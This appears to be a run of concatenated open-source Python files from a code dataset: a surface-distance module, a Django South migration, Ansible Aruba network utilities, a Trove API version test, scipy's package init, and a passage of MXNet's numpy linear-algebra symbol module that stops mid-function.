r_pnt, infodict, ier, m = fsolve(get_norm_cond, # @UnusedVariable
r0_pnt,
fprime=get_d_norm_cond,
full_output=True)
return r_pnt
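# Usage sketch (illustrative): with F = [r_, s_, -r_**2 - s_**2] and
# x_pnt = [0, 0, 1], fsolve converges to the apex r_pnt = [0, 0], the
# same case exercised in the __main__ demo at the bottom of this file.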
# =========================================================================
# Distance operator
# =========================================================================
def get_dist(self, r_pnt, x_pnt, t):
args = np.hstack([r_pnt, [t]])
return np.linalg.norm(x_pnt - self.F_fn(*args))
# =========================================================================
# Get Derivative of Distance of X to F with respect to X
# =========================================================================
d_dist_xyz = Property(depends_on='+input')
@cached_property
def _get_d_dist_xyz(self):
'''Calculate the derivatives of the distance
with respect to nodal coordinates X.
'''
XF_vct = self.X - self.F_mtx
XF_vct = np.array(XF_vct)[:, 0]
XF2_vct = sm.sqrt(np.dot(XF_vct, XF_vct))
dXF_vct = [sm.diff(XF2_vct, var_) for var_ in [x_, y_, z_]]
return dXF_vct
d_dist_xyz_fn = Property(depends_on='+input')
@cached_property
def _get_d_dist_xyz_fn(self):
return sm.lambdify([r_, s_, x_, y_, z_, t_], self.d_dist_xyz)
def get_d_dist_xyz(self, r_pnt, x_pnt, t):
args = np.hstack([r_pnt, x_pnt, [t]])
return self.d_dist_xyz_fn(*args)
class FuFaceNodeDistance(HasTraits):
'''Calculate and maintain distances between
a set of points X_arr and parametrically
defined surface F.
'''
name = Str('<noname>')
pf_operator = Instance(ParamFaceOperator)
'''Operators on a parametric surface
'''
def _pf_operator_default(self):
return ParamFaceOperator()
F = DelegatesTo('pf_operator')
t = Float(0.0, input=True)
X_arr = Array(float, input=True)
'''Input coordinates of nodes for the evaluation of the
closest point projection.
'''
def _X_arr_default(self):
return np.array([[0, 0, 1]], dtype='f')
r_arr = Property(Array(float), depends_on='+input, F, t, X_arr[]')
'''Closest point projection of X points to the target surface.
'''
@cached_property
def _get_r_arr(self):
r0_pnt = np.array([0, 0], dtype='f')
return np.array([self.pf_operator.get_r_pnt(r0_pnt, x_pnt, self.t)
for x_pnt in self.X_arr], dtype='f')
d_arr = Property(Array(float), depends_on='+input, F, t, X_arr[]')
'''Distance from the target surface.
'''
@cached_property
def _get_d_arr(self):
return np.array([self.pf_operator.get_dist(r_pnt, x_pnt, self.t)
for r_pnt, x_pnt in zip(self.r_arr, self.X_arr)],
dtype='f')
d_xyz_arr = Property(Array(float), depends_on='+input, F, t, X_arr[]')
'''Gradient of the distance from the target surface.
'''
@cached_property
def _get_d_xyz_arr(self):
return np.array([self.pf_operator.get_d_dist_xyz(r_pnt, x_pnt, self.t)
for r_pnt, x_pnt in zip(self.r_arr, self.X_arr)],
dtype='f')
ls_arr = Property(Array(float), depends_on='+input, F, t, X_arr[]')
'''Level set representation of the surface - used for visualization.
'''
@cached_property
def _get_ls_arr(self):
return np.array([self.pf_operator.get_ls(r_pnt, x_pnt, self.t)
for r_pnt, x_pnt in zip(self.r_arr, self.X_arr)],
dtype='f')
def Rf(self, x, y, z, t):
'''Evaluate the distance from the surface for all points in x, y, z and time t
'''
self.X_arr = np.c_[x.flatten(), y.flatten(), z.flatten()]
self.t = t
ls_arr = self.ls_arr
return ls_arr.reshape(x.shape)
class FuTargetFace(Fu, Visual3D):
'''Target face linked with a set of nodes.
'''
control_face = Instance(FuFaceNodeDistance)
nodes = Array(int, value=[])
viz3d_classes = dict(default=FuTargetFaceViz3D)
def FuTF(expr, nodes):
return FuTargetFace(control_face=FuFaceNodeDistance(F=expr),
nodes=nodes)
@provides(IFu)
class FuTargetFaces(Fu, Visual3D):
'''Container of target faces
'''
tf_lst = List([])
target_faces = Property
def _new_fu_target_face(self, value):
return FuTargetFace(forming_task=self.forming_task,
control_face=FuFaceNodeDistance(F=value[0]),
nodes=value[1])
def _set_target_faces(self, values):
self.tf_lst = [self._new_fu_target_face(value)
for value in values]
def _get_target_faces(self):
return self.tf_lst
def __setitem__(self, idx, value):
self.tf_lst[idx] = self._new_fu_target_face(value)
def append(self, value):
self.tf_lst.append(self._new_fu_target_face(value))
def __getitem__(self, idx):
return self.tf_lst[idx]
def get_f(self, t=0):
'''Get the norm of the distances between the individual target faces and nodes.
'''
x = self.forming_task.formed_object.x
d_arr = np.array([])
for tf in self.target_faces:
tf.control_face.X_arr = x[tf.nodes]
tf.control_face.t = t
d_arr = np.append(d_arr, tf.control_face.d_arr)
return np.linalg.norm(d_arr)
def get_f_du(self, t=0):
'''Get the derivatives with respect to individual displacements.
'''
x = self.forming_task.formed_object.x
d_xyz = np.zeros_like(x)
dist_arr = np.array([])
for tf in self.target_faces:
tf.control_face.X_arr = x[tf.nodes]
tf.control_face.t = t
d_arr = tf.control_face.d_arr
dist_arr = np.append(dist_arr, d_arr)
d_xyz[tf.nodes] += tf.control_face.d_arr[:, np.newaxis] * \
tf.control_face.d_xyz_arr
dist_norm = np.linalg.norm(dist_arr)
d_xyz[np.isnan(d_xyz)] = 0.0
return d_xyz.flatten() / dist_norm
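# Note (illustrative): this is the chain rule for the Euclidean norm,
# grad ||d|| = (sum_i d_i * grad d_i) / ||d||, with each target face
# accumulating its contribution into the per-node gradient array.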
def _viz3d_dict_default(self):
raise NotImplementedError
if __name__ == '__main__':
cp = ParamFaceOperator(F=[r_, s_, t_])
x_pnt = np.array([0, 0.2, 1], dtype='f')
r0_pnt = np.array([0, 0], dtype='f')
print('r0_pnt:\t\t\t\t', r0_pnt)
print('value of F at r0_pnt:\t\t', cp.get_F(r0_pnt, 0))
print('value of dF_rs at r0_pnt:\t', cp.get_dF_rs(r0_pnt, 0))
print('x_pnt:\t\t\t\t', x_pnt)
print('normality r0_pnt - x_pnt:\t', cp.get_norm_cond(r0_pnt, x_pnt, 0))
print('d(normality r0_pnt - x_pnt):\t', cp.get_d_norm_cond(r0_pnt,
x_pnt, 0))
r_pnt = cp.get_r_pnt(r0_pnt, x_pnt, 0)
print('r_pnt:\t\t\t\t', r_pnt)
print('distance x_pnt - r_pnt:\t\t', cp.get_dist(r_pnt, x_pnt, 0))
target_face = FuFaceNodeDistance(F=[r_, s_, -r_ ** 2 - s_ ** 2],
X_arr=[[0, 0.2, 1],
[1, 4, -2],
[7, 8, 9]])
print('x_arr:\n', target_face.X_arr)
print('r_arr:\n', target_face.r_arr)
print('d_arr:\n', target_face.d_arr)
print('ls_arr:\n', target_face.ls_arr)
print('d_xyz_arr:\n', target_face.d_xyz_arr)
target_face.X_arr = target_face.X_arr + 1.0
print('x_arr:\n', target_face.X_arr)
print('r_arr:\n', target_face.r_arr)
print('d_arr:\n', target_face.d_arr)
print('ls_arr:\n', target_face.ls_arr)
print('d_xyz_arr:\n', target_face.d_xyz_arr)
target_face.F = [r_, s_, t_]
print('x_arr:\n', target_face.X_arr)
print('r_arr:\n', target_face.r_arr)
print('d_arr:\n', target_face.d_arr)
print('ls_arr:\n', target_face.ls_arr)
print('d_xyz_arr:\n', target_face.d_xyz_arr)
| gpl-3.0 |
jmcbailey/django-cached-hitcount | cached_hitcount/south_migrations/0003_auto__add_index_hit_added.py | 2 | 2090 | # -*- coding: utf-8 -*-
from south.utils import datetime_utils as datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding index on 'Hit', fields ['added']
db.create_index('cached_hitcount_hit', ['added'])
def backwards(self, orm):
# Removing index on 'Hit', fields ['added']
db.delete_index('cached_hitcount_hit', ['added'])
models = {
'cached_hitcount.blacklistip': {
'Meta': {'object_name': 'BlacklistIP'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'ip': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '40'})
},
'cached_hitcount.hit': {
'Meta': {'ordering': "('-hits',)", 'object_name': 'Hit'},
'added': ('django.db.models.fields.DateField', [], {'default': 'datetime.datetime(2014, 3, 7, 0, 0)', 'db_index': 'True'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'content_type_set_for_hit'", 'to': "orm['contenttypes.ContentType']"}),
'hits': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'object_pk': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'})
},
'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
}
}
complete_apps = ['cached_hitcount'] | gpl-3.0 |
daenamkim/ansible | lib/ansible/module_utils/network/aruba/aruba.py | 2 | 4597 | # This code is part of Ansible, but is an independent component.
# This particular file snippet, and this file snippet only, is BSD licensed.
# Modules you write using this snippet, which is embedded dynamically by Ansible
# still belong to the author of the module, and may assign their own license
# to the complete work.
#
# (c) 2016 Red Hat Inc.
#
# Redistribution and use in source and binary forms, with or without modification,
# are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED.
# IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE
# USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
from ansible.module_utils._text import to_text
from ansible.module_utils.basic import env_fallback, return_values
from ansible.module_utils.network.common.utils import to_list, ComplexList
from ansible.module_utils.connection import exec_command
_DEVICE_CONFIGS = {}
aruba_provider_spec = {
'host': dict(),
'port': dict(type='int'),
'username': dict(fallback=(env_fallback, ['ANSIBLE_NET_USERNAME'])),
'password': dict(fallback=(env_fallback, ['ANSIBLE_NET_PASSWORD']), no_log=True),
'ssh_keyfile': dict(fallback=(env_fallback, ['ANSIBLE_NET_SSH_KEYFILE']), type='path'),
'timeout': dict(type='int'),
}
aruba_argument_spec = {
'provider': dict(type='dict', options=aruba_provider_spec)
}
aruba_top_spec = {
'host': dict(removed_in_version=2.9),
'port': dict(removed_in_version=2.9, type='int'),
'username': dict(removed_in_version=2.9),
'password': dict(removed_in_version=2.9, no_log=True),
'ssh_keyfile': dict(removed_in_version=2.9, type='path'),
'timeout': dict(removed_in_version=2.9, type='int'),
}
aruba_argument_spec.update(aruba_top_spec)
def get_provider_argspec():
return aruba_provider_spec
def check_args(module, warnings):
pass
def get_config(module, flags=None):
flags = [] if flags is None else flags
cmd = 'show running-config '
cmd += ' '.join(flags)
cmd = cmd.strip()
try:
return _DEVICE_CONFIGS[cmd]
except KeyError:
rc, out, err = exec_command(module, cmd)
if rc != 0:
module.fail_json(msg='unable to retrieve current config', stderr=to_text(err, errors='surrogate_then_replace'))
cfg = to_text(out, errors='surrogate_then_replace').strip()
_DEVICE_CONFIGS[cmd] = cfg
return cfg
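# Note (illustrative, not part of the original file): repeated
# get_config(module) calls within a single task run are served from the
# module-level _DEVICE_CONFIGS cache above, so the device is queried only
# once per distinct command string.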
def to_commands(module, commands):
spec = {
'command': dict(key=True),
'prompt': dict(),
'answer': dict()
}
transform = ComplexList(spec, module)
return transform(commands)
def run_commands(module, commands, check_rc=True):
responses = list()
commands = to_commands(module, to_list(commands))
for cmd in commands:
cmd = module.jsonify(cmd)
rc, out, err = exec_command(module, cmd)
if check_rc and rc != 0:
module.fail_json(msg=to_text(err, errors='surrogate_then_replace'), rc=rc)
responses.append(to_text(out, errors='surrogate_then_replace'))
return responses
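# Illustrative usage sketch (not part of the original file): commands may be
# plain strings or dicts matching the `spec` in to_commands, e.g.
#
#   run_commands(module, ['show version',
#                         {'command': 'write memory',
#                          'prompt': 'confirm', 'answer': 'y'}])
#
# where `module` is an AnsibleModule bound to a network_cli connection.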
def load_config(module, commands):
rc, out, err = exec_command(module, 'configure terminal')
if rc != 0:
module.fail_json(msg='unable to enter configuration mode', err=to_text(out, errors='surrogate_then_replace'))
for command in to_list(commands):
if command == 'end':
continue
rc, out, err = exec_command(module, command)
if rc != 0:
module.fail_json(msg=to_text(err, errors='surrogate_then_replace'), command=command, rc=rc)
exec_command(module, 'end')
| gpl-3.0 |
redhat-openstack/trove | trove/tests/api/versions.py | 8 | 3296 | # Copyright 2011 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from proboscis.asserts import assert_equal
from proboscis import before_class
from proboscis import SkipTest
from proboscis import test
from troveclient.compat.exceptions import ClientException
from trove import tests
from trove.tests.util import create_dbaas_client
from trove.tests.util import test_config
from trove.tests.util.users import Requirements
GROUP = "dbaas.api.versions"
@test(groups=[tests.DBAAS_API, GROUP, tests.PRE_INSTANCES, 'DBAAS_VERSIONS'],
depends_on_groups=["services.initialize"])
class Versions(object):
"""Test listing all versions and verify the current version."""
@before_class
def setUp(self):
"""Sets up the client."""
user = test_config.users.find_user(Requirements(is_admin=False))
self.client = create_dbaas_client(user)
@test
def test_list_versions_index(self):
versions = self.client.versions.index(test_config.version_url)
assert_equal(1, len(versions))
assert_equal("CURRENT", versions[0].status,
message="Version status: %s" % versions[0].status)
expected_version = test_config.values['trove_version']
assert_equal(expected_version, versions[0].id,
message="Version ID: %s" % versions[0].id)
expected_api_updated = test_config.values['trove_api_updated']
assert_equal(expected_api_updated, versions[0].updated,
message="Version updated: %s" % versions[0].updated)
def _request(self, url, method='GET', response='200'):
resp, body = None, None
full_url = test_config.version_url + url
try:
resp, body = self.client.client.request(full_url, method)
assert_equal(resp.get('status', ''), response)
except ClientException as ce:
assert_equal(str(ce.http_status), response)
return body
@test
def test_no_slash_no_version(self):
self._request('')
@test
def test_no_slash_with_version(self):
if test_config.auth_strategy == "fake":
raise SkipTest("Skipping this test since auth is faked.")
self._request('/v1.0', response='401')
@test
def test_with_slash_no_version(self):
self._request('/')
@test
def test_with_slash_with_version(self):
if test_config.auth_strategy == "fake":
raise SkipTest("Skipping this test since auth is faked.")
self._request('/v1.0/', response='401')
@test
def test_request_no_version(self):
self._request('/dbaas/instances', response='404')
@test
def test_request_bogus_version(self):
self._request('/0.0/', response='404')
| apache-2.0 |
mtrbean/scipy | scipy/__init__.py | 62 | 4048 | """
SciPy: A scientific computing package for Python
================================================
Documentation is available in the docstrings and
online at http://docs.scipy.org.
Contents
--------
SciPy imports all the functions from the NumPy namespace, and in
addition provides:
Subpackages
-----------
Using any of these subpackages requires an explicit import. For example,
``import scipy.cluster``.
::
cluster --- Vector Quantization / Kmeans
fftpack --- Discrete Fourier Transform algorithms
integrate --- Integration routines
interpolate --- Interpolation Tools
io --- Data input and output
linalg --- Linear algebra routines
linalg.blas --- Wrappers to BLAS library
linalg.lapack --- Wrappers to LAPACK library
misc --- Various utilities that don't have
another home.
ndimage --- n-dimensional image package
odr --- Orthogonal Distance Regression
optimize --- Optimization Tools
signal --- Signal Processing Tools
sparse --- Sparse Matrices
sparse.linalg --- Sparse Linear Algebra
sparse.linalg.dsolve --- Linear Solvers
sparse.linalg.dsolve.umfpack --- Interface to the UMFPACK library
sparse.linalg.eigen --- Sparse Eigenvalue Solvers
sparse.linalg.eigen.lobpcg --- Locally Optimal Block Preconditioned
Conjugate Gradient Method (LOBPCG)
spatial --- Spatial data structures and algorithms
special --- Special functions
stats --- Statistical Functions
Utility tools
-------------
::
test --- Run scipy unittests
show_config --- Show scipy build configuration
show_numpy_config --- Show numpy build configuration
__version__ --- Scipy version string
__numpy_version__ --- Numpy version string
"""
from __future__ import division, print_function, absolute_import
__all__ = ['test']
from numpy import show_config as show_numpy_config
if show_numpy_config is None:
raise ImportError("Cannot import scipy when running from numpy source directory.")
from numpy import __version__ as __numpy_version__
# Import numpy symbols to scipy name space
import numpy as _num
linalg = None
from numpy import *
from numpy.random import rand, randn
from numpy.fft import fft, ifft
from numpy.lib.scimath import *
__all__ += _num.__all__
__all__ += ['randn', 'rand', 'fft', 'ifft']
del _num
# Remove the linalg imported from numpy so that the scipy.linalg package can be
# imported.
del linalg
__all__.remove('linalg')
# We first need to detect if we're being called as part of the scipy
# setup procedure itself in a reliable manner.
try:
__SCIPY_SETUP__
except NameError:
__SCIPY_SETUP__ = False
if __SCIPY_SETUP__:
import sys as _sys
_sys.stderr.write('Running from scipy source directory.\n')
del _sys
else:
try:
from scipy.__config__ import show as show_config
except ImportError:
msg = """Error importing scipy: you cannot import scipy while
being in scipy source directory; please exit the scipy source
tree first, and relaunch your python interpreter."""
raise ImportError(msg)
from scipy.version import version as __version__
from scipy._lib._version import NumpyVersion as _NumpyVersion
if _NumpyVersion(__numpy_version__) < '1.6.2':
import warnings
warnings.warn("Numpy 1.6.2 or above is recommended for this version of "
"scipy (detected version %s)" % __numpy_version__,
UserWarning)
del _NumpyVersion
from numpy.testing import Tester
test = Tester().test
bench = Tester().bench
| bsd-3-clause |
DickJC123/mxnet | python/mxnet/symbol/numpy/linalg.py | 9 | 35356 | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""Namespace for operators used in Gluon dispatched by F=symbol."""
import numpy as _np
from . import _symbol
from . import _op as _mx_sym_np # pylint: disable=unused-import
from . import _internal as _npi
__all__ = ['norm', 'svd', 'cholesky', 'qr', 'inv', 'det', 'slogdet', 'solve', 'tensorinv', 'tensorsolve',
'pinv', 'eigvals', 'eig', 'eigvalsh', 'eigh', 'lstsq', 'matrix_rank']
def matrix_rank(M, tol=None, hermitian=False):
"""
Return matrix rank of array using SVD method
Rank of the array is the number of singular values of the array that are
greater than `tol`.
Parameters
----------
M : {(M,), (..., M, N)} _Symbol
Input vector or stack of matrices.
tol : (...) _Symbol, float, optional
Threshold below which SVD values are considered zero. If `tol` is
None, and ``S`` is an array with singular values for `M`, and
``eps`` is the epsilon value for datatype of ``S``, then `tol` is
set to ``S.max() * max(M.shape) * eps``.
hermitian : bool, optional
If True, `M` is assumed to be Hermitian (symmetric if real-valued),
enabling a more efficient method for finding singular values.
Defaults to False.
Returns
-------
rank : (...) _Symbol
Rank of M.
"""
finfo_eps_32 = _np.finfo(_np.float32).eps
finfo_eps_64 = _np.finfo(_np.float64).eps
if tol is None:
return _npi.matrix_rank_none_tol(M, finfo_eps_32, finfo_eps_64, hermitian)
else:
return _npi.matrix_rank(M, tol, hermitian)
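# Illustrative sketch (not in the original file; shown via the ndarray front
# end that mirrors this symbol API):
#
#   from mxnet import np
#   np.linalg.matrix_rank(np.eye(4))         # full rank: 4
#   np.linalg.matrix_rank(np.zeros((4, 4)))  # rank 0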
def lstsq(a, b, rcond='warn'):
r"""
Return the least-squares solution to a linear matrix equation.
Solves the equation :math:`a x = b` by computing a vector `x` that
minimizes the squared Euclidean 2-norm :math:`\| b - a x \|^2_2`.
The equation may be under-, well-, or over-determined (i.e., the
number of linearly independent rows of `a` can be less than, equal
to, or greater than its number of linearly independent columns).
If `a` is square and of full rank, then `x` (but for round-off error)
is the "exact" solution of the equation.
Parameters
----------
a : (M, N) _Symbol
"Coefficient" matrix.
b : {(M,), (M, K)} _Symbol
Ordinate or "dependent variable" values. If `b` is two-dimensional,
the least-squares solution is calculated for each of the `K` columns
of `b`.
rcond : float, optional
Cut-off ratio for small singular values of `a`.
For the purposes of rank determination, singular values are treated
as zero if they are smaller than `rcond` times the largest singular
value of `a`
The default of ``warn`` or ``-1`` will use the machine precision as
`rcond` parameter. The default of ``None`` will use the machine
precision times `max(M, N)` as `rcond` parameter.
Returns
-------
x : {(N,), (N, K)} _Symbol
Least-squares solution. If `b` is two-dimensional,
the solutions are in the `K` columns of `x`.
residuals : {(1,), (K,), (0,)} _Symbol
Sums of residuals.
Squared Euclidean 2-norm for each column in ``b - a*x``.
If the rank of `a` is < N or M <= N, this is an empty array.
If `b` is 1-dimensional, this is a (1,) shape array.
Otherwise the shape is (K,).
rank : int
Rank of matrix `a`.
s : (min(M, N),) _Symbol
Singular values of `a`.
Raises
------
MXNetError
If computation does not converge.
Notes
-----
If `b` is a matrix, then all array results are returned as matrices.
"""
new_default = False
finfo_eps_32 = _np.finfo(_np.float32).eps
finfo_eps_64 = _np.finfo(_np.float64).eps
if rcond is None:
rcond = 1
new_default = True
if rcond == "warn":
rcond = -1
x, residuals, rank, s = _npi.lstsq(a, b, rcond=rcond, finfoEps32=finfo_eps_32, finfoEps64=finfo_eps_64, new_default=new_default) # pylint: disable=line-too-long
return (x, residuals, rank, s)
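# Illustrative sketch (not in the original file; values assumed, mirroring the
# classic y = m*x + c least-squares fit):
#
#   from mxnet import np
#   x = np.array([0., 1., 2., 3.])
#   y = np.array([-1., 0.2, 0.9, 2.1])
#   A = np.stack([x, np.ones(4)], axis=1)
#   m_c, residuals, rank, s = np.linalg.lstsq(A, y, rcond=None)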
def pinv(a, rcond=1e-15, hermitian=False):
r"""
Compute the (Moore-Penrose) pseudo-inverse of a matrix.
Calculate the generalized inverse of a matrix using its
singular-value decomposition (SVD) and including all
*large* singular values.
Parameters
----------
a : (..., M, N) ndarray
Matrix or stack of matrices to be pseudo-inverted.
rcond : (...) {float or ndarray of float}, optional
Cutoff for small singular values.
Singular values less than or equal to
``rcond * largest_singular_value`` are set to zero.
Broadcasts against the stack of matrices.
hermitian : bool, optional
If True, `a` is assumed to be Hermitian (symmetric if real-valued),
enabling a more efficient method for finding singular values.
Defaults to False.
Returns
-------
B : (..., N, M) ndarray
The pseudo-inverse of `a`. If `a` is a `matrix` instance, then so
is `B`.
Raises
------
MXNetError
If the SVD computation does not converge.
Notes
-----
The pseudo-inverse of a matrix A, denoted :math:`A^+`, is
defined as: "the matrix that 'solves' [the least-squares problem]
:math:`Ax = b`," i.e., if :math:`\bar{x}` is said solution, then
:math:`A^+` is that matrix such that :math:`\bar{x} = A^+b`.
It can be shown that if :math:`Q_1 \Sigma Q_2^T = A` is the singular
value decomposition of A, then
:math:`A^+ = Q_2 \Sigma^+ Q_1^T`, where :math:`Q_{1,2}` are
orthogonal matrices, :math:`\Sigma` is a diagonal matrix consisting
of A's so-called singular values (followed, typically, by
zeros), and then :math:`\Sigma^+` is simply the diagonal matrix
consisting of the reciprocals of A's singular values
(again, followed by zeros). [1]_
References
----------
.. [1] G. Strang, *Linear Algebra and Its Applications*, 2nd Ed., Orlando,
FL, Academic Press, Inc., 1980, pp. 139-142.
Examples
--------
The following example checks that ``a * a+ * a == a`` and
``a+ * a * a+ == a+``:
>>> a = np.random.randn(2, 3)
>>> pinv_a = np.linalg.pinv(a)
>>> (a - np.dot(a, np.dot(pinv_a, a))).sum()
array(0.)
>>> (pinv_a - np.dot(pinv_a, np.dot(a, pinv_a))).sum()
array(0.)
"""
if hermitian is True:
raise NotImplementedError("hermitian is not supported yet...")
if _symbol._np.isscalar(rcond):
return _npi.pinv_scalar_rcond(a, rcond, hermitian)
return _npi.pinv(a, rcond, hermitian)
# pylint: disable=too-many-return-statements
def norm(x, ord=None, axis=None, keepdims=False):
r"""Matrix or vector norm.
This function is able to return one of eight different matrix norms,
or one of an infinite number of vector norms (described below), depending
on the value of the ``ord`` parameter.
Parameters
----------
x : _Symbol
Input array. If `axis` is None, `x` must be 1-D or 2-D.
ord : {non-zero int, inf, -inf, 'fro', 'nuc'}, optional
Order of the norm (see table under ``Notes``). inf means numpy's
`inf` object.
axis : {int, 2-tuple of ints, None}, optional
If `axis` is an integer, it specifies the axis of `x` along which to
compute the vector norms. If `axis` is a 2-tuple, it specifies the
axes that hold 2-D matrices, and the matrix norms of these matrices
are computed. If `axis` is None then either a vector norm (when `x`
is 1-D) or a matrix norm (when `x` is 2-D) is returned.
keepdims : bool, optional
If this is set to True, the axes which are normed over are left in the
result as dimensions with size one. With this option the result will
broadcast correctly against the original `x`.
Returns
-------
n : _Symbol
Norm of the matrix or vector(s).
Notes
-----
For values of ``ord <= 0``, the result is, strictly speaking, not a
mathematical 'norm', but it may still be useful for various numerical
purposes.
The following norms can be calculated:
===== ============================ ==========================
ord norm for matrices norm for vectors
===== ============================ ==========================
None Frobenius norm 2-norm
'fro' Frobenius norm --
'nuc' -- --
inf max(sum(abs(x), axis=1)) max(abs(x))
-inf min(sum(abs(x), axis=1)) min(abs(x))
0 -- sum(x != 0)
1 max(sum(abs(x), axis=0)) as below
-1 min(sum(abs(x), axis=0)) as below
2 -- as below
-2 -- as below
other -- sum(abs(x)**ord)**(1./ord)
===== ============================ ==========================
The Frobenius norm is given by [1]_:
:math:`||A||_F = [\sum_{i,j} abs(a_{i,j})^2]^{1/2}`
The nuclear norm is the sum of the singular values.
When computing matrix norms with ``ord`` in (-1, 1, inf, -inf), you must
pass `axis` explicitly; the default axis is not supported.
References
----------
.. [1] G. H. Golub and C. F. Van Loan, *Matrix Computations*,
Baltimore, MD, Johns Hopkins University Press, 1985, pg. 15
Examples
--------
>>> from mxnet import np
>>> a = np.arange(9) - 4
>>> a
array([-4., -3., -2., -1., 0., 1., 2., 3., 4.])
>>> b = a.reshape((3, 3))
>>> b
array([[-4., -3., -2.],
[-1., 0., 1.],
[ 2., 3., 4.]])
>>> np.linalg.norm(a)
array(7.745967)
>>> np.linalg.norm(b)
array(7.745967)
>>> np.linalg.norm(b, 'fro')
array(7.745967)
>>> np.linalg.norm(a, 'inf')
array(4.)
>>> np.linalg.norm(b, 'inf', axis=(0, 1))
array(9.)
>>> np.linalg.norm(a, '-inf')
array(0.)
>>> np.linalg.norm(b, '-inf', axis=(0, 1))
array(2.)
>>> np.linalg.norm(a, 1)
array(20.)
>>> np.linalg.norm(b, 1, axis=(0, 1))
array(7.)
>>> np.linalg.norm(a, -1)
array(0.)
>>> np.linalg.norm(b, -1, axis=(0, 1))
array(6.)
>>> np.linalg.norm(a, 2)
array(7.745967)
>>> np.linalg.norm(a, -2)
array(0.)
>>> np.linalg.norm(a, 3)
array(5.8480353)
>>> np.linalg.norm(a, -3)
array(0.)
Using the `axis` argument to compute vector norms:
>>> c = np.array([[ 1, 2, 3],
... [-1, 1, 4]])
>>> np.linalg.norm(c, axis=0)
array([1.4142135, 2.236068 , 5. ])
>>> np.linalg.norm(c, axis=1)
array([3.7416573, 4.2426405])
>>> np.linalg.norm(c, ord=1, axis=1)
array([6., 6.])
Using the `axis` argument to compute matrix norms:
>>> m = np.arange(8).reshape(2,2,2)
>>> np.linalg.norm(m, axis=(1,2))
array([ 3.7416573, 11.224973 ])
>>> np.linalg.norm(m[0, :, :]), np.linalg.norm(m[1, :, :])
(array(3.7416573), array(11.224973))
"""
if axis is None and ord is None:
return _npi.norm(x, ord=2, axis=None, keepdims=keepdims, flag=-2)
if axis is None or isinstance(axis, (int, tuple)): # pylint: disable=too-many-nested-blocks
if axis is not None:
if isinstance(axis, int):
axis = (axis, )
if len(axis) == 2:
if ord in ['inf', '-inf']:
row_axis, col_axis = axis
if not keepdims:
if row_axis > col_axis:
row_axis -= 1
if ord == 'inf':
return _npi.sum(_symbol.abs(x), axis=col_axis, keepdims=keepdims).max(axis=row_axis, keepdims=keepdims) # pylint: disable=line-too-long
else:
return _npi.sum(_symbol.abs(x), axis=col_axis, keepdims=keepdims).min(axis=row_axis, keepdims=keepdims) # pylint: disable=line-too-long
if ord in [1, -1]:
row_axis, col_axis = axis
if not keepdims:
if row_axis < col_axis:
col_axis -= 1
if ord == 1:
return _npi.sum(_symbol.abs(x), axis=row_axis, keepdims=keepdims).max(axis=col_axis, keepdims=keepdims) # pylint: disable=line-too-long
elif ord == -1:
return _npi.sum(_symbol.abs(x), axis=row_axis, keepdims=keepdims).min(axis=col_axis, keepdims=keepdims) # pylint: disable=line-too-long
if ord in [2, -2]:
return _npi.norm(x, ord=ord, axis=axis, keepdims=keepdims, flag=0)
if ord is None:
return _npi.norm(x, ord=2, axis=axis, keepdims=keepdims, flag=1)
if ord == 'inf':
return _npi.max(_symbol.abs(x), axis=axis, keepdims=keepdims)
#return _npi.norm(x, ord=float('inf'), axis=axis, keepdims=keepdims, flag=3)
elif ord == '-inf':
return _npi.min(_symbol.abs(x), axis=axis, keepdims=keepdims)
